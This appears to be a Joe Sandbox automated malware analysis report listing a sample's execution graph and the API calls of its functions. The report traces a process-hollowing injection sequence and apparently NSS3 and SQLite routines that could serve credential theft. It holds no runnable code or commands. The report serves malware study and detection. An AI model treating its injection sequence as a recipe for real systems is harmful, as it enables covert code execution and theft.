                                                              execution_graph 391 427b010 392 427b049 391->392 400 427b0e1 392->400 401 4279850 392->401 396 427b115 419 4279fb0 396->419 398 427b1a7 422 427a4f0 NtAllocateVirtualMemory 398->422 402 4279875 401->402 403 4279fb0 VirtualAlloc 402->403 405 427990f 403->405 404 4279921 404->396 413 4279b10 404->413 405->404 406 4279989 NtCreateFile 405->406 407 4279a2b 406->407 409 4279a34 406->409 408 4279a36 CreateFileMappingA 407->408 407->409 411 4279a94 MapViewOfFile 408->411 412 4279a64 408->412 409->404 410 4279abc FindCloseChangeNotification 409->410 410->404 411->409 412->409 412->411 414 4279b5e 413->414 415 4279b77 414->415 416 4279c2d NtProtectVirtualMemory 414->416 415->396 431 427a150 416->431 420 4279ff1 419->420 421 427a024 VirtualAlloc 420->421 421->398 423 427a580 422->423 424 427a6f7 GetTempFileNameA 423->424 433 4279c90 424->433 426 427a71b CreateFileA WriteFile 427 427a780 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 427a82a 427->428 429 427a88e Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 427a851 WriteProcessMemory 428->430 429->400 430->428 432 4279c5c NtProtectVirtualMemory 431->432 432->415 435 4279c95 433->435 436 427a0d0 437 4279fb0 VirtualAlloc 436->437 438 427a0dd 437->438

                                                              Callgraph

                                                              Executed Functions

                                                              Function 0427A4F0 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 317threadmemoryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0427A561
                                                              • GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 0427A714
                                                              • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 0427A742
                                                              • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 0427A76C
                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 0427A7B6
                                                              • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 0427A7D0
                                                              • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 0427A7FB
                                                              • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 0427A81F
                                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0427A881
                                                              • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 0427A8AF
                                                              • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 0427A8DA
                                                              • ResumeThread.KERNELBASE(?), ref: 0427A8EC
                                                              • ExitProcess.KERNEL32(00000000), ref: 0427A8F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Offset: 04279000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_4279000_EE6.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
                                                              • String ID: kate
                                                              • API String ID: 1984375786-4076676908
                                                              • Opcode ID: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                              • Instruction ID: b586bb36ee5cdfddaa0d1ecdb57f77e17cd5e21892291ec8fcabcfa43d5b6bc3
                                                              • Opcode Fuzzy Hash: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                              • Instruction Fuzzy Hash: 90E1E975A10208AFDB54CF84C895FEEB7B5BF88314F108199E908AB391D771AE85CF94
                                                              Function 04279850 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 04279FB0: VirtualAlloc.KERNELBASE(00000000,0427990F,00003000,00000040), ref: 0427A034
                                                              • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 04279A1B
                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04279ACC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Offset: 04279000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_4279000_EE6.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                              • String ID: @
                                                              • API String ID: 482251274-2766056989
                                                              • Opcode ID: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                              • Instruction ID: 3f7653973e3abfa5694fb2a1cb26d50f0cadd4b2ae41cc6d519fd7be3666fdb3
                                                              • Opcode Fuzzy Hash: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                              • Instruction Fuzzy Hash: D581FE71A11218EFEB24DF54DC55FDAB3B5AF48700F1481E9EA09AB290D7706A84CF94
                                                              Function 04279B10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 59 4279b10-4279b75 call 4279740 62 4279b77-4279b79 59->62 63 4279b7e-4279b93 59->63 64 4279c81-4279c84 62->64 65 4279b95-4279b97 63->65 66 4279b9c-4279bb4 63->66 65->64 67 4279bbf-4279bc9 66->67 68 4279c17-4279c1b 67->68 69 4279bcb-4279bdb 67->69 70 4279c1d-4279c21 68->70 71 4279c29-4279c2b 68->71 72 4279c15 69->72 73 4279bdd-4279c13 69->73 70->71 74 4279c23-4279c27 70->74 71->64 72->67 73->68 74->71 76 4279c2d-4279c7c NtProtectVirtualMemory call 427a150 NtProtectVirtualMemory 74->76 76->64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Offset: 04279000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_4279000_EE6.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .tex
                                                              • API String ID: 0-1946526065
                                                              • Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                              • Instruction ID: 3e5c8e21e8f3228fa39076a41f64ba5d503b3d1b8934caa79a98722fd9352686
                                                              • Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                              • Instruction Fuzzy Hash: A551F5B1E10209DFDF04CF84C895BEEFBB5EF48314F249599D915AB280D375AA85CBA0
                                                              Function 04279FB0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,0427990F,00003000,00000040), ref: 0427A034
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Offset: 04279000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_4279000_EE6.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: VirtualAlloc
                                                              • API String ID: 4275171209-164498762
                                                              • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                              • Instruction ID: c1108ae5c9bd68351f285f7cef9e9e8dd7809c5a8140813e115c636b4db1b6aa
                                                              • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                              • Instruction Fuzzy Hash: 1E11E2A0D082C9DEFF01DBE898097EFBFB55F15708F044098D5446B282D6BA5758C7B6

                                                              Non-executed Functions

                                                              Function 6D137C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D137C33
                                                              • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6D137C66
                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6D137D1E
                                                                • Part of subcall function 6D137870: SECOID_FindOID_Util.NSS3(?,?,?,6D1391C5), ref: 6D13788F
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D137D48
                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6D137D71
                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D137DD3
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D137DE1
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D137DF8
                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D137E1A
                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6D137E58
                                                                • Part of subcall function 6D137870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D1391C5), ref: 6D1378BB
                                                                • Part of subcall function 6D137870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6D1391C5), ref: 6D1378FA
                                                                • Part of subcall function 6D137870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6D1391C5), ref: 6D137930
                                                                • Part of subcall function 6D137870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6D1391C5), ref: 6D137951
                                                                • Part of subcall function 6D137870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6D137964
                                                                • Part of subcall function 6D137870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D13797A
                                                                • Part of subcall function 6D137870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6D137988
                                                                • Part of subcall function 6D137870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6D137998
                                                                • Part of subcall function 6D137870: free.MOZGLUE(00000000), ref: 6D1379A7
                                                                • Part of subcall function 6D137870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6D1391C5), ref: 6D1379BB
                                                                • Part of subcall function 6D137870: PR_GetCurrentThread.NSS3(?,?,?,?,6D1391C5), ref: 6D1379CA
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D137E49
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D137F8C
                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D137F98
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D137FBF
                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D137FD9
                                                              • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6D138038
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6D138050
                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6D138093
                                                              • SECOID_FindOID_Util.NSS3 ref: 6D137F29
                                                                • Part of subcall function 6D1307B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6D0D8298,?,?,?,6D0CFCE5,?), ref: 6D1307BF
                                                                • Part of subcall function 6D1307B0: PL_HashTableLookup.NSS3(?,?), ref: 6D1307E6
                                                                • Part of subcall function 6D1307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D13081B
                                                                • Part of subcall function 6D1307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D130825
                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D138072
                                                              • SECOID_FindOID_Util.NSS3 ref: 6D1380F5
                                                                • Part of subcall function 6D13BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6D13800A,00000000,?,00000000,?), ref: 6D13BC3F
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                              • String ID:
                                                              • API String ID: 2815116071-0
                                                              • Opcode ID: 514efa842d0a197674e126142cc4cab63552d7cf8a8ab8d321b38b77cebd9478
                                                              • Instruction ID: d8ae6b8f2653ebd8441c848ab508762d2dc937c68372a03499c64fcd93a15db6
                                                              • Opcode Fuzzy Hash: 514efa842d0a197674e126142cc4cab63552d7cf8a8ab8d321b38b77cebd9478
                                                              • Instruction Fuzzy Hash: AAE1B371A08312DFE711CF28D880B2B77E5BF94318F02496DE9999B254E7B2EC45CB52
                                                              Function 6D0C1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 6D0C1C6B
                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6D0C1C75
                                                              • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6D0C1CA1
                                                              • GetLengthSid.ADVAPI32(?), ref: 6D0C1CA9
                                                              • malloc.MOZGLUE(00000000), ref: 6D0C1CB4
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6D0C1CCC
                                                              • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6D0C1CE4
                                                              • GetLengthSid.ADVAPI32(?), ref: 6D0C1CEC
                                                              • malloc.MOZGLUE(00000000), ref: 6D0C1CFD
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6D0C1D0F
                                                              • CloseHandle.KERNEL32(?), ref: 6D0C1D17
                                                              • AllocateAndInitializeSid.ADVAPI32 ref: 6D0C1D4D
                                                              • GetLastError.KERNEL32 ref: 6D0C1D73
                                                              • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6D0C1D7F
                                                              Strings
                                                              • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6D0C1D7A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                              • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                              • API String ID: 3748115541-1216436346
                                                              • Opcode ID: 07461c104aa05ee2a047e6cfcbb9111204818404b942537ab907d400303b5833
                                                              • Instruction ID: 8ab917cb84a6284d860ba15c116f78a8f5eb942eb875a26c7e19ec41cbce0bae
                                                              • Opcode Fuzzy Hash: 07461c104aa05ee2a047e6cfcbb9111204818404b942537ab907d400303b5833
                                                              • Instruction Fuzzy Hash: 973162B5900218AFEB11DF64DC4CBAB7BB8FF4A708F0050A5FA0992150E7309A94DF65
                                                              Function 6D0C3D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 6D0C3DFB
                                                              • __allrem.LIBCMT ref: 6D0C3EEC
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0C3FA3
                                                              • memcpy.VCRUNTIME140(?,?,00000001), ref: 6D0C4047
                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0C40DE
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0C415F
                                                              • __allrem.LIBCMT ref: 6D0C416B
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0C4288
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0C42AB
                                                              • __allrem.LIBCMT ref: 6D0C42B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                              • String ID: %02d$%03d$%04d$%lld
                                                              • API String ID: 703928654-3678606288
                                                              • Opcode ID: c295f8a8bb63cf645c1e7b3c3a560ea0d9a5d64d22651c31047ee5dea7ed7e41
                                                              • Instruction ID: ebcc3d05f35003a2f34931d496097a2014a9970055bc6c483515ed2a81d0956c
                                                              • Opcode Fuzzy Hash: c295f8a8bb63cf645c1e7b3c3a560ea0d9a5d64d22651c31047ee5dea7ed7e41
                                                              • Instruction Fuzzy Hash: 50F10071A18745AFE715CF38C881B6EB7F6BF89304F108A2DE98597251E730E8428B42
                                                              Function 6D071C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D071D58
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D071EFD
                                                              • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6D071FB7
                                                              Strings
                                                              • attached databases must use the same text encoding as main database, xrefs: 6D0720CA
                                                              • abort due to ROLLBACK, xrefs: 6D072223
                                                              • sqlite_temp_master, xrefs: 6D071C5C
                                                              • unknown error, xrefs: 6D072291
                                                              • another row available, xrefs: 6D072287
                                                              • unsupported file format, xrefs: 6D072188
                                                              • table, xrefs: 6D071C8B
                                                              • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6D071F83
                                                              • no more rows available, xrefs: 6D072264
                                                              • sqlite_master, xrefs: 6D071C61
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                              • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                              • API String ID: 563213449-2102270813
                                                              • Opcode ID: ef451bc67041056ccd65de98bacc6e59943c9667119091e7109c4ae664fc2a2c
                                                              • Instruction ID: 281f7f503def9c25e07e53a4b90153aebcd4502a9555c2bbd3226d40c4794b53
                                                              • Opcode Fuzzy Hash: ef451bc67041056ccd65de98bacc6e59943c9667119091e7109c4ae664fc2a2c
                                                              • Instruction Fuzzy Hash: 9A12BD70A083429FE725CF28C49072AB7F2BF89314F55846DE9998F352D331E846CB96
                                                              Function 6D0FFC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6D0FFD06
                                                                • Part of subcall function 6D0FF670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6D0FF696
                                                                • Part of subcall function 6D0FF670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6D0FF789
                                                                • Part of subcall function 6D0FF670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6D0FF796
                                                                • Part of subcall function 6D0FF670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6D0FF79F
                                                                • Part of subcall function 6D0FF670: SECITEM_DupItem_Util.NSS3 ref: 6D0FF7F0
                                                                • Part of subcall function 6D123440: PK11_GetAllTokens.NSS3 ref: 6D123481
                                                                • Part of subcall function 6D123440: PR_SetError.NSS3(00000000,00000000), ref: 6D1234A3
                                                                • Part of subcall function 6D123440: TlsGetValue.KERNEL32 ref: 6D12352E
                                                                • Part of subcall function 6D123440: EnterCriticalSection.KERNEL32(?), ref: 6D123542
                                                                • Part of subcall function 6D123440: PR_Unlock.NSS3(?), ref: 6D12355B
                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6D0FFDAD
                                                                • Part of subcall function 6D12FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6D0D9003,?), ref: 6D12FD91
                                                                • Part of subcall function 6D12FD80: PORT_Alloc_Util.NSS3(A4686D13,?), ref: 6D12FDA2
                                                                • Part of subcall function 6D12FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686D13,?,?), ref: 6D12FDC4
                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6D0FFE00
                                                                • Part of subcall function 6D12FD80: free.MOZGLUE(00000000,?,?), ref: 6D12FDD1
                                                                • Part of subcall function 6D11E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6D11E5A0
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0FFEBB
                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6D0FFEC8
                                                              • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6D0FFED3
                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6D0FFF0C
                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6D0FFF23
                                                              • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6D0FFF4D
                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6D0FFFDA
                                                              • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6D100007
                                                              • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6D100029
                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6D100044
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                              • String ID:
                                                              • API String ID: 138705723-0
                                                              • Opcode ID: 18b2b628431f8aa0803740a6b9c848272191df57603e288b08ca9d68ca3f22f7
                                                              • Instruction ID: 4c3d9b1a68a524b1a25f4955871c4b5a5a90737c3addbd38acddacf5dbb8eda9
                                                              • Opcode Fuzzy Hash: 18b2b628431f8aa0803740a6b9c848272191df57603e288b08ca9d68ca3f22f7
                                                              • Instruction Fuzzy Hash: 6CB193715042029FE714CF29C880B3AFBE9FF88308F658A2DE999D7251E770E949CB51
                                                              Function 6D0F7D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6D0F7DDC
                                                                • Part of subcall function 6D1307B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6D0D8298,?,?,?,6D0CFCE5,?), ref: 6D1307BF
                                                                • Part of subcall function 6D1307B0: PL_HashTableLookup.NSS3(?,?), ref: 6D1307E6
                                                                • Part of subcall function 6D1307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D13081B
                                                                • Part of subcall function 6D1307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D130825
                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D0F7DF3
                                                              • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6D0F7F07
                                                              • PK11_GetPadMechanism.NSS3(00000000), ref: 6D0F7F57
                                                              • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6D0F7F98
                                                              • PK11_FreeSymKey.NSS3(?), ref: 6D0F7FC9
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D0F7FDE
                                                              • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6D0F8000
                                                                • Part of subcall function 6D119430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6D0F7F0C,?,00000000,00000000,00000000,?), ref: 6D11943B
                                                                • Part of subcall function 6D119430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6D11946B
                                                                • Part of subcall function 6D119430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6D119546
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D0F8110
                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6D0F811D
                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6D0F822D
                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D0F823C
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
